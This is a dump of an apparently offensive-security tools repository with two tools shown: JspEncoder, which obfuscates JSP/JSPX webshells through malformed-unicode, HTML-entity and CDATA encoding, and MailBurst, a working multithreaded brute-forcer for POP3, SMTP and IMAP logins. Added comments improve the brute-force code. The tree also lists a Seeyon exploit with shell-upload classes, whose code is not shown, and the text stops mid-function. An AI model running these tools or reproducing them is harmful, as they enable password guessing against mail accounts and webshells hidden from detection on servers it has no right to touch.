├── JspEncoder
├── README.md
├── pom.xml
└── src
│ └── main
│ ├── java
│ ├── cDataDecodeJspx.java
│ ├── cDataEncodeJspx.java
│ ├── classIn.java
│ ├── classOut.java
│ ├── decoderJsp.java
│ ├── encoderJsp.java
│ ├── htmlDecodeJspx.java
│ ├── htmlEncodeJspx.java
│ └── main.java
│ └── resources
│ └── META-INF
│ └── MANIFEST.MF
├── MailBurst
├── MailBrust.py
├── README.md
└── lib
│ ├── __init__.py
│ ├── __init__.pyc
│ ├── __pycache__
│ ├── __init__.cpython-38.pyc
│ ├── imapBrust.cpython-38.pyc
│ ├── imapsBrust.cpython-38.pyc
│ ├── pop3Brust.cpython-38.pyc
│ ├── pop3sBurst.cpython-38.pyc
│ ├── smtpBurst.cpython-38.pyc
│ └── smtpsBrust.cpython-38.pyc
│ ├── imapBrust.py
│ ├── imapsBrust.py
│ ├── pop3Brust.py
│ ├── pop3sBurst.py
│ ├── smtpBurst.py
│ └── smtpsBrust.py
├── PIC
└── BkG.jpg
├── README.md
└── SeeyonExp
├── README.md
├── pom.xml
├── src
├── META-INF
│ └── MANIFEST.MF
└── main
│ ├── META-INF
│ └── MANIFEST.MF
│ └── java
│ ├── DataConf.java
│ ├── Decoder.java
│ ├── Encoder.java
│ ├── ExecuteCode.java
│ ├── ExpMain.java
│ ├── HTTPClient.java
│ ├── JsonRead.java
│ ├── SSLClient.java
│ ├── Scanner.java
│ ├── UploadShell.java
│ └── VersionRecognition.java
└── vul.json
/JspEncoder/README.md:
--------------------------------------------------------------------------------
1 | # JspEncoder
2 |
3 | ### 0x00 开发日志
4 |
5 | 2020-11-16 V0.2 支持Jspx下HTML、CDATA实体编码
6 |
7 | 2020-11-6 V0.1 根据野外落地畸形unicode内存马判断编码方式,支持畸形unicode加解密
8 |
9 | ### 0x01 使用方法
10 |
11 | Jsp文件Unicode解码:java -jar JspEncoder.jar UniDe srcFile desFile
12 |
13 | Jsp文件Unicode编码:java -jar JspEncoder.jar UniEn srcFile desFile
14 |
15 | Jspx文件Html解码:java -jar JspEncoder.jar HtmlDe srcFile desFile
16 |
17 | Jspx文件Html编码:java -jar JspEncoder.jar HtmlEn srcFile desFile
18 |
19 | Jspx文件CDATA解码:java -jar JspEncoder.jar CdataDe srcFile desFile
20 |
21 | Jspx文件CDATA编码:java -jar JspEncoder.jar CdataEn srcFile desFile
22 |
23 | Base64文件输出为class文件:java -jar JspEncoder.jar ClassOut srcFile desFile
24 |
25 | class文件输出为Base64文件:java -jar JspEncoder.jar ClassIn srcFile desFile
26 |
27 | 使用参考:https://mp.weixin.qq.com/s/NKksirrM5Zg5BGCu4fY8LQ
28 |
29 | ### 0x02 注意事项
30 |
31 | 在进行Unicode编码时请去掉jsp文件的类声明和引入声明模块,否则jsp文件将无法运行
32 |
--------------------------------------------------------------------------------
/JspEncoder/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | org.example
8 | JspEncoder
9 | 1.0-SNAPSHOT
10 |
11 |
12 |
13 | org.apache.maven.plugins
14 | maven-compiler-plugin
15 |
16 | 8
17 | 8
18 |
19 |
20 |
21 |
22 |
23 |
24 | org.jdom
25 | jdom
26 | 2.0.2
27 |
28 |
29 |
30 |
--------------------------------------------------------------------------------
/JspEncoder/src/main/java/cDataDecodeJspx.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 |
public class cDataDecodeJspx {
    /**
     * Reads a JSPX file line by line (line breaks are dropped), strips a marker pair from the
     * joined text and writes the result to {@code desFile} behind a fixed prologue.
     * Per the README this is the "CDATA decode" direction for .jspx files.
     *
     * NOTE(review): the literals handed to replaceAll() and to the first write() show up
     * empty in this listing, and one source line is missing between them; they are
     * presumably the CDATA delimiters and an XML prologue that were lost when the page was
     * rendered. Confirm against the repository before relying on this copy - with empty
     * literals the method would just copy the (newline-stripped) input.
     *
     * @param srcFile JSPX file to decode; read with the platform default charset
     * @param desFile output path, overwritten if it exists
     * @throws IOException if the input cannot be read or the output cannot be written;
     *         the streams are not closed on that path (no try-with-resources / finally)
     */
    public cDataDecodeJspx(String srcFile,String desFile) throws IOException {
        File fileIn = new File(srcFile);
        FileInputStream fis = new FileInputStream(fileIn);
        InputStreamReader streamReader = new InputStreamReader(fis);
        BufferedReader bufread = new BufferedReader(streamReader);
        String line;
        StringBuilder strB = new StringBuilder();
        // readLine() strips the terminators, so the whole file becomes one line.
        while ((line = bufread.readLine())!=null){
            strB.append(line);
        }
        streamReader.close();
        bufread.close();
        String strRes = String.valueOf(strB);
        strRes = strRes.replaceAll("","");
        File f = new File(desFile);
        FileWriter writer = new FileWriter(f);
        writer.write("");
        writer.write(strRes);
        writer.close();
        System.out.println("目标文件输出至" + desFile);
    }
}
27 |
--------------------------------------------------------------------------------
/JspEncoder/src/main/java/cDataEncodeJspx.java:
--------------------------------------------------------------------------------
1 | import org.jdom2.Document;
2 | import org.jdom2.Element;
3 | import org.jdom2.JDOMException;
4 | import org.jdom2.Namespace;
5 | import org.jdom2.input.SAXBuilder;
6 | import org.jdom2.output.XMLOutputter;
7 | import org.xml.sax.InputSource;
8 |
9 | import java.io.*;
10 | import java.util.List;
11 |
12 | public class cDataEncodeJspx {
13 | public cDataEncodeJspx(String srcFile,String desFile) throws IOException, JDOMException {
14 | SAXBuilder sb = new SAXBuilder();
15 | Document doc = sb.build(new FileInputStream(srcFile));
16 | Element root = doc.getRootElement();
17 | Namespace namespace = root.getNamespace();
18 | List list = root.getChildren("scriptlet",namespace);
19 | String result = "";
20 | for (int i=0;i";
26 | }
27 | element.setText(result);
28 | }
29 | List list1 = root.getChildren("declaration",namespace);
30 | result = "";
31 | for (int i=0;i";
37 | }
38 | element.setText(result);
39 | }
40 | XMLOutputter outputter = new XMLOutputter();
41 | outputter.output(doc,new FileOutputStream(desFile));
42 | File fileIn = new File(desFile);
43 | FileInputStream fis = new FileInputStream(fileIn);
44 | InputStreamReader streamReader = new InputStreamReader(fis);
45 | BufferedReader bufread = new BufferedReader(streamReader);
46 | String line;
47 | StringBuilder strB = new StringBuilder();
48 | while ((line = bufread.readLine())!=null){
49 | strB.append(line);
50 | }
51 | streamReader.close();
52 | bufread.close();
53 | String strRes = String.valueOf(strB);
54 | strRes = strRes.replaceAll("<","<");
55 | strRes = strRes.replaceAll(">",">");
56 | File f = new File(desFile);
57 | FileWriter writer = new FileWriter(f);
58 | writer.write("");
59 | writer.write(strRes);
60 | writer.close();
61 | System.out.println("[!]文件编码完成,已输出至" + desFile);
62 | }
63 | }
64 |
--------------------------------------------------------------------------------
/JspEncoder/src/main/java/classIn.java:
--------------------------------------------------------------------------------
import java.io.*;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
3 |
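public class classIn {
    /**
     * Base64-encodes the raw bytes of {@code srcFile} and writes the result to {@code desFile}
     * as a single line: no line wrapping and no "-----BEGIN/END CERTIFICATE-----" banners.
     *
     * The encoding is done in-process with {@link Base64}. The previous version shelled out
     * ({@code cmd /c certutil -f -encode ...} on Windows, {@code bash -c ... | base64 > ...}
     * elsewhere), which spliced the two user-supplied paths straight into a shell command
     * line (a path containing {@code &}, {@code ;} or {@code |} is executed as a command, and a
     * path with a space is split into several arguments by {@code Runtime.exec(String)}),
     * waited a fixed three seconds instead of for the child to finish, and on Linux wrote
     * whatever line wrapping the system {@code base64} applied. A local Base64 conversion
     * needs none of that.
     *
     * @param srcFile path of the file (typically a .class) to encode
     * @param desFile path the Base64 text is written to; overwritten if it exists
     * @throws IOException if {@code srcFile} cannot be read or {@code desFile} cannot be written
     * @throws InterruptedException never thrown any more; kept in the signature so callers
     *         that catch it still compile
     */
    public classIn(String srcFile, String desFile) throws IOException, InterruptedException {
        byte[] raw = Files.readAllBytes(Paths.get(srcFile));
        // Basic (RFC 4648 section 4) alphabet without MIME wrapping, so the text can be
        // pasted into a single string literal; this matches the Windows output of the old code.
        String encoded = Base64.getEncoder().encodeToString(raw);
        Files.write(Paths.get(desFile), encoded.getBytes(StandardCharsets.US_ASCII));
        System.out.println("[!]文件已base64编码到" + desFile);
    }
}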
36 |
--------------------------------------------------------------------------------
/JspEncoder/src/main/java/classOut.java:
--------------------------------------------------------------------------------
import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
3 |
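class classOut {
    /**
     * Decodes the Base64 text in {@code srcFile} and writes the resulting bytes to
     * {@code desFile}; the inverse of {@code classIn}.
     *
     * Whitespace anywhere in the input is ignored, so both single-line text and
     * line-wrapped text (certutil / base64(1) style) decode. The reader and the output
     * stream are closed via try-with-resources even when decoding fails; the original
     * never closed its reader. {@code java.util.Base64} is called directly - loading it
     * reflectively through the context class loader bought nothing for a local
     * command-line tool and only hid the dependency from the compiler.
     *
     * @param srcFile path of the Base64 text file
     * @param desFile path the decoded bytes (normally a .class file) are written to;
     *                overwritten if it exists
     * @throws IOException if the input cannot be read or the output cannot be written
     * @throws IllegalArgumentException if the input is not valid Base64
     * The reflection-related exceptions in the signature are never thrown any more; they
     * stay declared so existing callers that catch them still compile.
     */
    public classOut(String srcFile,String desFile) throws ClassNotFoundException, NoSuchMethodException, IOException, InvocationTargetException, IllegalAccessException {
        StringBuilder text = new StringBuilder();
        try (BufferedReader br = new BufferedReader(
                new InputStreamReader(new FileInputStream(srcFile), StandardCharsets.US_ASCII))) {
            String line;
            while ((line = br.readLine()) != null) {
                text.append(line);
            }
        }
        // The basic decoder rejects any character outside the alphabet, so strip every
        // whitespace run (indentation, stray spaces), not just the line breaks readLine() ate.
        byte[] bytecode = Base64.getDecoder().decode(text.toString().replaceAll("\\s+", ""));
        try (OutputStream out = new FileOutputStream(desFile)) {
            out.write(bytecode);
        }
        System.out.println("[!]Class文件已输出至" + desFile);
    }

}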
33 |
--------------------------------------------------------------------------------
/JspEncoder/src/main/java/decoderJsp.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 | import java.math.BigInteger;
3 | public class decoderJsp {
4 | public decoderJsp(String srcFile, String desFile) throws IOException {
5 | FileInputStream fis = new FileInputStream(srcFile); //文件输入流
6 | InputStreamReader isr = new InputStreamReader(fis); //输入流读取器
7 | BufferedReader br = new BufferedReader(isr);
8 | String line = "";
9 | String text = "";
10 | while ((line = br.readLine())!= null){
11 | text = text + line;
12 | }
13 | String regex = "\\\\u+";
14 | String result = text.replaceAll(regex,"\\\\u");
15 | String[] split = result.split("\\\\u");
16 | String result1 = "";
17 | for (int i=0;i";
40 | FileWriter writer = new FileWriter(desFile);
41 | writer.write("");
42 | writer.write(result);
43 | writer.flush();
44 | writer.close();
45 | System.out.println("[!]文件编码完成,已输出至" + desFile);
46 | }
47 | }
48 |
--------------------------------------------------------------------------------
/JspEncoder/src/main/java/htmlDecodeJspx.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 |
3 | public class htmlDecodeJspx {
4 | public htmlDecodeJspx(String srcFile,String desFile) throws IOException {
5 | File fileIn = new File(srcFile);
6 | FileInputStream fis = new FileInputStream(fileIn);
7 | InputStreamReader streamReader = new InputStreamReader(fis);
8 | BufferedReader bufread = new BufferedReader(streamReader);
9 | String line;
10 | StringBuilder strB = new StringBuilder();
11 | while ((line = bufread.readLine())!=null){
12 | strB.append(line);
13 | }
14 | streamReader.close();
15 | bufread.close();
16 | String strRes = String.valueOf(strB);
17 | String result = "";
18 | String nowStr = "";
19 | String[] valueArray = strRes.split("&");
20 | for (int i=0;i 可选参数为:")
11 | print("\n\t 暴破格式:python MailBrust.py pop.qq.com POP3 username.txt password.txt 110")
12 | print("\n\t 最后的端口参数取决于邮箱服务器,110为任意端口值,可以进行修改")
13 | sys.exit(1)
14 | protocolDict = {'POP3': 110, 'SMTP': 25, 'IMAP': 143, 'POP3S': 995, 'SMTPS': 465, 'IMAPS': 993}
15 | mailAddr = sys.argv[1]
16 | mailProt = sys.argv[2]
17 | mailPort = protocolDict[mailProt]
18 | if len(sys.argv) == 6:
19 | mailPort = int(sys.argv[5])
20 | try:
21 | userLines = open(sys.argv[3], "r").readlines()
22 | except(IOError):
23 | print("[-]错误信息:请检查文件路径\n")
24 | try:
25 | passLines = open(sys.argv[4], "r").readlines()
26 | except(IOError):
27 | print("[-]错误信息:请检查文件路径\n")
28 | if sys.argv[2] == "POP3":
29 | pop3Thread = pop3Brust.pop3Brust(mailAddr, mailPort, userLines, passLines)
30 | pop3Thread.start()
31 | pop3Thread.join()
32 | print("[-]提示信息:破解完毕")
33 | if sys.argv[2] == "POP3S":
34 | pop3sThread = pop3sBurst.pop3sBrust(mailAddr, mailPort, userLines, passLines)
35 | pop3sThread.start()
36 | pop3sThread.join()
37 | print("[-]提示信息:破解完毕")
38 | if sys.argv[2] == "SMTP":
39 | smtpThread = smtpBurst.smtpBurst(mailAddr, mailPort, userLines, passLines)
40 | smtpThread.start()
41 | smtpThread.join()
42 | print("[-]提示信息:破解完毕")
43 | if sys.argv[2] == "SMTPS":
44 | smtpsThread = smtpsBrust.smtpsBurst(mailAddr, mailPort, userLines, passLines)
45 | smtpsThread.start()
46 | smtpsThread.join()
47 | print("[-]提示信息:破解完毕")
48 | if sys.argv[2] == "IMAP":
49 | imapThread = imapBrust.imapBrust(mailAddr, mailPort, userLines, passLines)
50 | imapThread.start()
51 | imapThread.join()
52 | print("[-]提示信息:破解完毕")
53 | if sys.argv[2] == "IMAPS":
54 | imapsThread = imapsBrust.imapsBrust(mailAddr, mailPort, userLines, passLines)
55 | imapsThread.start()
56 | imapsThread.join()
57 | print("[-]提示信息:破解完毕")
# Entry point: argument parsing and protocol dispatch live in start() above.
if __name__ == '__main__':
    start()
--------------------------------------------------------------------------------
/MailBurst/README.md:
--------------------------------------------------------------------------------
1 | # MailBrust
2 |
3 | ### 0x00 开发日志
4 |
5 | 2020-8-13 V0.2 增加多线程异步
6 |
7 | 2020-8-11 V0.1 单线程全协议邮箱用户名密码暴力破解
8 |
9 | ### 0x01 使用方法
10 |
11 | POP3协议暴力破解:python MailBrust.py xxx.com POP3 username.txt password.txt
12 |
13 | POP3S协议暴力破解:python MailBrust.py xxx.com POP3S username.txt password.txt
14 |
15 | SMTP协议暴力破解:python MailBrust.py xxx.com SMTP username.txt password.txt
16 |
17 | SMTPS协议暴力破解:python MailBrust.py xxx.com SMTPS username.txt password.txt
18 |
19 | IMAP协议暴力破解:python MailBrust.py xxx.com IMAP username.txt password.txt
20 |
21 | IMAPS协议暴力破解:python MailBrust.py xxx.com IMAPS username.txt password.txt
22 |
23 | 使用参考:https://mp.weixin.qq.com/s/NKksirrM5Zg5BGCu4fY8LQ
24 |
--------------------------------------------------------------------------------
/MailBurst/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__init__.py
--------------------------------------------------------------------------------
/MailBurst/lib/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__init__.pyc
--------------------------------------------------------------------------------
/MailBurst/lib/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/__init__.cpython-38.pyc
--------------------------------------------------------------------------------
/MailBurst/lib/__pycache__/imapBrust.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/imapBrust.cpython-38.pyc
--------------------------------------------------------------------------------
/MailBurst/lib/__pycache__/imapsBrust.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/imapsBrust.cpython-38.pyc
--------------------------------------------------------------------------------
/MailBurst/lib/__pycache__/pop3Brust.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/pop3Brust.cpython-38.pyc
--------------------------------------------------------------------------------
/MailBurst/lib/__pycache__/pop3sBurst.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/pop3sBurst.cpython-38.pyc
--------------------------------------------------------------------------------
/MailBurst/lib/__pycache__/smtpBurst.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/smtpBurst.cpython-38.pyc
--------------------------------------------------------------------------------
/MailBurst/lib/__pycache__/smtpsBrust.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/smtpsBrust.cpython-38.pyc
--------------------------------------------------------------------------------
/MailBurst/lib/imapBrust.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import imaplib
3 | import threading
4 | import asyncio
5 |
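class imapBrust(threading.Thread):
    """Worker thread that tries every username/password pair against one IMAP server.

    Each guess goes through the module-level ``login`` coroutine, run to
    completion on the module-level ``loop`` while ``threadLock`` is held, so
    guesses are serialised rather than concurrent; the thread only keeps the
    caller's main thread free.
    """

    def __init__(self, mailAddr, mailPort, userLines, passLines):
        threading.Thread.__init__(self)
        self.mailAddr = mailAddr    # IMAP host name or address
        self.mailPort = mailPort    # TCP port of the plaintext IMAP service
        self.userLines = userLines  # dictionary lines; login() strips their newlines
        self.passLines = passLines

    def run(self):
        # Probe once so an unreachable server is reported before the loop starts,
        # and log that probe connection out again instead of leaking its socket.
        try:
            probe = imaplib.IMAP4(self.mailAddr, self.mailPort)
        except (OSError, imaplib.IMAP4.error):
            print("[-]错误信息:服务器错误!")
            return
        try:
            probe.logout()
        except (OSError, imaplib.IMAP4.error):
            pass  # best effort only; each guess below opens its own connection
        if len(self.userLines) < 1 or len(self.passLines) < 1:
            print("[-]错误信息:字典文件中无内容,请检查!")
            return
        for user in self.userLines:
            for pwd in self.passLines:
                # "with" releases the lock even if login() raises; the bare
                # acquire()/release() pair left it held forever on an exception.
                with threadLock:
                    loop.run_until_complete(login(self.mailAddr, self.mailPort, user, pwd))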
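def _closeQuietly(imapServer):
    """Best-effort LOGOUT so every attempt releases its socket; errors are ignored."""
    try:
        imapServer.logout()
    except (OSError, imaplib.IMAP4.error):
        try:
            imapServer.shutdown()
        except OSError:
            pass


async def login(mailAddr, mailPort, username, password):
    """Try one username/password pair against the IMAP server.

    Strips the newline the dictionary lines carry, tries a plain LOGIN and, if
    the server rejects it (wrong password, or LOGIN not allowed on this port),
    tries CRAM-MD5 on a fresh connection. Prints the result in the tool's usual
    format and returns True on success, False otherwise.

    Declared ``async`` only because the callers drive it through
    ``loop.run_until_complete``; imaplib is blocking and nothing here awaits.
    The previous version did ``await imaplib.IMAP4(...)`` in its CRAM-MD5
    branch, which raises TypeError (an IMAP4 object is not awaitable), so that
    fallback never ran, and its bare ``except`` reported every failure -
    connection errors included - as a wrong password.
    """
    username = username.replace("\n", "")
    password = password.replace("\n", "")
    for mechanism in ("LOGIN", "CRAM-MD5"):
        try:
            imapServer = imaplib.IMAP4(mailAddr, mailPort)
        except (OSError, imaplib.IMAP4.error):
            # Unreachable host or bad greeting: a server problem, not a miss.
            print("[-]错误信息:服务器错误!")
            return False
        try:
            if mechanism == "LOGIN":
                imapServer.login(username, password)
            else:
                imapServer.login_cram_md5(username, password)
            print("[-]密码正确" + "账户名:" + username + "密码:" + password)
            return True
        except imaplib.IMAP4.error:
            pass  # rejected with this mechanism; try the next one
        except OSError:
            print("[-]错误信息:服务器错误!")
            return False
        finally:
            _closeQuietly(imapServer)
    print("[-]错误信息:密码错误!")
    return False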
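# One lock shared by every worker thread of this module: run() holds it for the
# whole of each login() call, so guesses are serialised, not parallel.
threadLock = threading.Lock()
# A private loop instead of asyncio.get_event_loop(): called at import time with
# no loop running, get_event_loop() is deprecated (DeprecationWarning since 3.12)
# and would bind this module to the main thread's loop although run() drives it
# from a worker thread. run_until_complete() works on a loop that is not current.
loop = asyncio.new_event_loop()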
--------------------------------------------------------------------------------
/MailBurst/lib/imapsBrust.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import imaplib
3 | import threading
4 | import asyncio
5 |
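class imapsBrust(threading.Thread):
    """Worker thread that tries every username/password pair against one IMAPS server.

    Each guess goes through the module-level ``login`` coroutine, run to
    completion on the module-level ``loop`` while ``threadLock`` is held, so
    guesses are serialised rather than concurrent; the thread only keeps the
    caller's main thread free.
    """

    def __init__(self, mailAddr, mailPort, userLines, passLines):
        threading.Thread.__init__(self)
        self.mailAddr = mailAddr    # IMAPS host name or address
        self.mailPort = mailPort    # TCP port of the implicit-TLS IMAP service
        self.userLines = userLines  # dictionary lines; login() strips their newlines
        self.passLines = passLines

    def run(self):
        # Probe once so an unreachable server is reported before the loop starts,
        # and log that probe connection out again instead of leaking its socket.
        # No ssl_context is passed, so the stdlib default applies: the server
        # certificate is not verified.
        try:
            probe = imaplib.IMAP4_SSL(self.mailAddr, self.mailPort)
        except (OSError, imaplib.IMAP4.error):
            print("[-]错误信息:服务器错误!")
            return
        try:
            probe.logout()
        except (OSError, imaplib.IMAP4.error):
            pass  # best effort only; each guess below opens its own connection
        if len(self.userLines) < 1 or len(self.passLines) < 1:
            print("[-]错误信息:字典文件中无内容,请检查!")
            return
        for user in self.userLines:
            for pwd in self.passLines:
                # "with" releases the lock even if login() raises; the bare
                # acquire()/release() pair left it held forever on an exception.
                with threadLock:
                    loop.run_until_complete(login(self.mailAddr, self.mailPort, user, pwd))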
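def _closeQuietly(imapServer):
    """Best-effort LOGOUT so every attempt releases its socket; errors are ignored."""
    try:
        imapServer.logout()
    except (OSError, imaplib.IMAP4.error):
        try:
            imapServer.shutdown()
        except OSError:
            pass


async def login(mailAddr, mailPort, username, password):
    """Try one username/password pair against the IMAPS server.

    Strips the newline the dictionary lines carry, tries a plain LOGIN and, if
    the server rejects it, tries CRAM-MD5 on a fresh connection. Prints the
    result in the tool's usual format and returns True on success, False
    otherwise.

    The connection is made without an ssl_context, so the stdlib default
    applies and the server certificate is NOT verified: anyone who can
    intercept the connection can also read the credentials being tested.

    Declared ``async`` only because the callers drive it through
    ``loop.run_until_complete``; imaplib is blocking and nothing here awaits.
    The previous version did ``await imaplib.IMAP4_SSL(...)`` in its CRAM-MD5
    branch, which raises TypeError (the object is not awaitable), so that
    fallback never ran, and its bare ``except`` reported every failure -
    connection and TLS errors included - as a wrong password.
    """
    username = username.replace("\n", "")
    password = password.replace("\n", "")
    for mechanism in ("LOGIN", "CRAM-MD5"):
        try:
            imapServer = imaplib.IMAP4_SSL(mailAddr, mailPort)
        except (OSError, imaplib.IMAP4.error):
            # Unreachable host, TLS failure or bad greeting: not a wrong password.
            print("[-]错误信息:服务器错误!")
            return False
        try:
            if mechanism == "LOGIN":
                imapServer.login(username, password)
            else:
                imapServer.login_cram_md5(username, password)
            print("[-]密码正确" + "账户名:" + username + "密码:" + password)
            return True
        except imaplib.IMAP4.error:
            pass  # rejected with this mechanism; try the next one
        except OSError:
            print("[-]错误信息:服务器错误!")
            return False
        finally:
            _closeQuietly(imapServer)
    print("[-]错误信息:密码错误!")
    return False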
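# One lock shared by every worker thread of this module: run() holds it for the
# whole of each login() call, so guesses are serialised, not parallel.
threadLock = threading.Lock()
# A private loop instead of asyncio.get_event_loop(): called at import time with
# no loop running, get_event_loop() is deprecated (DeprecationWarning since 3.12)
# and would bind this module to the main thread's loop although run() drives it
# from a worker thread. run_until_complete() works on a loop that is not current.
loop = asyncio.new_event_loop()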
--------------------------------------------------------------------------------
/MailBurst/lib/pop3Brust.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import poplib
3 | import threading
4 | import asyncio
5 |
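class pop3Brust(threading.Thread):
    """Worker thread that tries every username/password pair against one POP3 server.

    Each guess goes through the module-level ``login`` coroutine, run to
    completion on the module-level ``loop`` while ``threadLock`` is held, so
    guesses are serialised rather than concurrent; the thread only keeps the
    caller's main thread free.
    """

    def __init__(self, mailAddr, mailPort, userLines, passLines):
        threading.Thread.__init__(self)
        self.mailAddr = mailAddr    # POP3 host name or address
        self.mailPort = mailPort    # TCP port of the plaintext POP3 service
        self.userLines = userLines  # dictionary lines; login() strips their newlines
        self.passLines = passLines

    def run(self):
        # Probe once so an unreachable server is reported before the loop starts,
        # and QUIT that probe connection instead of leaking its socket.
        try:
            probe = poplib.POP3(self.mailAddr, self.mailPort)
        except (poplib.error_proto, OSError):
            print("[-]错误信息:服务器错误!")
            return
        try:
            probe.quit()
        except (poplib.error_proto, OSError):
            try:
                probe.close()  # best effort only; each guess opens its own connection
            except OSError:
                pass
        if len(self.userLines) < 1 or len(self.passLines) < 1:
            print("[-]错误信息:字典文件中无内容,请检查!")
            return
        for user in self.userLines:
            for pwd in self.passLines:
                # "with" releases the lock even if login() raises; the bare
                # acquire()/release() pair left it held forever on an exception.
                with threadLock:
                    loop.run_until_complete(login(self.mailAddr, self.mailPort, user, pwd))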
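def _closeQuietly(pop3Server):
    """Best-effort QUIT so every attempt releases its socket; errors are ignored."""
    try:
        pop3Server.quit()
    except (poplib.error_proto, OSError):
        try:
            pop3Server.close()
        except OSError:
            pass


async def login(mailAddr, mailPort, username, password):
    """Try one username/password pair against the POP3 server (USER/PASS).

    Strips the newline the dictionary lines carry, prints the result in the
    tool's usual format and returns True on success, False otherwise. A
    connection failure is reported as a server error rather than as a wrong
    password so a dead host does not look like an exhausted dictionary.

    Declared ``async`` only because the callers drive it through
    ``loop.run_until_complete``; poplib is blocking and nothing here awaits.
    The previous version did ``await poplib.POP3(...)``, which raises
    TypeError because a POP3 object is not awaitable; its bare ``except`` then
    reported every attempt - the right password included - as a wrong one.
    """
    username = username.replace("\n", "")
    password = password.replace("\n", "")
    try:
        pop3Server = poplib.POP3(mailAddr, mailPort)
    except (poplib.error_proto, OSError):
        print("[-]错误信息:服务器错误!")
        return False
    try:
        pop3Server.user(username)
        pop3Server.pass_(password)
        print("[-]密码正确" + "账户名:" + username + "密码:" + password)
        return True
    except poplib.error_proto:
        # -ERR from the server on USER or PASS: credentials rejected.
        print("[-]错误信息:密码错误!")
        return False
    except OSError:
        print("[-]错误信息:服务器错误!")
        return False
    finally:
        _closeQuietly(pop3Server)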
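# One lock shared by every worker thread of this module: run() holds it for the
# whole of each login() call, so guesses are serialised, not parallel.
threadLock = threading.Lock()
# A private loop instead of asyncio.get_event_loop(): called at import time with
# no loop running, get_event_loop() is deprecated (DeprecationWarning since 3.12)
# and would bind this module to the main thread's loop although run() drives it
# from a worker thread. run_until_complete() works on a loop that is not current.
loop = asyncio.new_event_loop()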
--------------------------------------------------------------------------------
/MailBurst/lib/pop3sBurst.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import poplib
3 | import threading
4 | import asyncio
5 |
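class pop3sBrust(threading.Thread):
    """Worker thread that tries every username/password pair against one POP3S server.

    Each guess goes through the module-level ``login`` coroutine, run to
    completion on the module-level ``loop`` while ``threadLock`` is held, so
    guesses are serialised rather than concurrent; the thread only keeps the
    caller's main thread free.
    """

    def __init__(self, mailAddr, mailPort, userLines, passLines):
        threading.Thread.__init__(self)
        self.mailAddr = mailAddr    # POP3S host name or address
        self.mailPort = mailPort    # TCP port of the implicit-TLS POP3 service
        self.userLines = userLines  # dictionary lines; login() strips their newlines
        self.passLines = passLines

    def run(self):
        # Probe once so an unreachable server is reported before the loop starts,
        # and QUIT that probe connection instead of leaking its socket. No ssl
        # context is passed, so the stdlib default applies: the server
        # certificate is not verified.
        try:
            probe = poplib.POP3_SSL(self.mailAddr, self.mailPort)
        except (poplib.error_proto, OSError):
            print("[-]错误信息:服务器错误!")
            return
        try:
            probe.quit()
        except (poplib.error_proto, OSError):
            try:
                probe.close()  # best effort only; each guess opens its own connection
            except OSError:
                pass
        if len(self.userLines) < 1 or len(self.passLines) < 1:
            print("[-]错误信息:字典文件中无内容,请检查!")
            return
        for user in self.userLines:
            for pwd in self.passLines:
                # "with" releases the lock even if login() raises; the bare
                # acquire()/release() pair left it held forever on an exception.
                with threadLock:
                    loop.run_until_complete(login(self.mailAddr, self.mailPort, user, pwd))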
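def _closeQuietly(pop3Server):
    """Best-effort QUIT so every attempt releases its socket; errors are ignored."""
    try:
        pop3Server.quit()
    except (poplib.error_proto, OSError):
        try:
            pop3Server.close()
        except OSError:
            pass


async def login(mailAddr, mailPort, username, password):
    """Try one username/password pair against the POP3S server (USER/PASS over TLS).

    Strips the newline the dictionary lines carry, prints the result in the
    tool's usual format and returns True on success, False otherwise. A
    connection or TLS failure is reported as a server error rather than as a
    wrong password.

    The connection is made without an ssl context, so the stdlib default
    applies and the server certificate is NOT verified: anyone who can
    intercept the connection can also read the credentials being tested.

    Declared ``async`` only because the callers drive it through
    ``loop.run_until_complete``; poplib is blocking and nothing here awaits.
    The previous version did ``await poplib.POP3_SSL(...)``, which raises
    TypeError because the object is not awaitable; its bare ``except`` then
    reported every attempt - the right password included - as a wrong one.
    """
    username = username.replace("\n", "")
    password = password.replace("\n", "")
    try:
        pop3Server = poplib.POP3_SSL(mailAddr, mailPort)
    except (poplib.error_proto, OSError):
        print("[-]错误信息:服务器错误!")
        return False
    try:
        pop3Server.user(username)
        pop3Server.pass_(password)
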